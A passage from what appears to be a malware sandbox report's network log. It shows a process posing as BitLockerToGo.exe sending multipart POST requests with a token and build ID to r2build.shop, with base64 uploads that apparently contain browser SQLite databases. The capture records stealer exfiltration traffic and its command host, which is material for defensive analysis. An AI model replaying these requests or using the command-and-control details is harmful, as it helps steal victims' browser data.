                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                    Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:50 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:51 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    17192.168.2.44977094.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:51 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----gvs00r1nym79rq1vs0zu
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 493
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:51 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 67 76 73 30 30 72 31 6e 79 6d 37 39 72 71 31 76 73 30 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 67 76 73 30 30 72 31 6e 79 6d 37 39 72 71 31 76 73 30 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 67 76 73 30 30 72 31 6e 79 6d 37 39 72 71 31 76 73 30 7a 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------gvs00r1nym79rq1vs0zuContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------gvs00r1nym79rq1vs0zuContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------gvs00r1nym79rq1vs0zuCont
                                                                                                                                                                                                                                    2025-01-09 13:01:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:52 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    18192.168.2.44977194.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----2nop8qimgv3w47ymgd2v
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 169765
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 6e 6f 70 38 71 69 6d 67 76 33 77 34 37 79 6d 67 64 32 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 6f 70 38 71 69 6d 67 76 33 77 34 37 79 6d 67 64 32 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 6f 70 38 71 69 6d 67 76 33 77 34 37 79 6d 67 64 32 76 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------2nop8qimgv3w47ymgd2vContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------2nop8qimgv3w47ymgd2vContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------2nop8qimgv3w47ymgd2vCont
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:53 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                    Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                    2025-01-09 13:01:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:54 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
